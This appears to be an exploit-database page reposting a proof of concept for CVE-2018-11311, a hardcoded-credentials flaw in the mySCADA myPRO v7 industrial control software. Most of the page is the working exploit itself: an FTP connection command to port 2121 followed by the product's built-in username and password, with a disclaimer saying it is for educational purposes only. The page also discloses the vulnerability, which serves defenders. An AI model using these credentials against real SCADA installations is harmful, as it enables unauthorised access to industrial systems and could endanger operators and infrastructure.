Myscada mypro 7 hardcoded credentials Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-06-25 | Type : remote | Platform : hardware
This exploit / vulnerability Myscada mypro 7 hardcoded credentials is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials
# Date: 2018-07-02
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://myscada.org
# Software Link: https://www.myscada.org/mypro/
# Version: v7.0.45
# Tested on: Windows/Linux
# CVE-2018-11311
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password

# PoC

ftp [IP] 2121

username: myscada

password: Vikuk63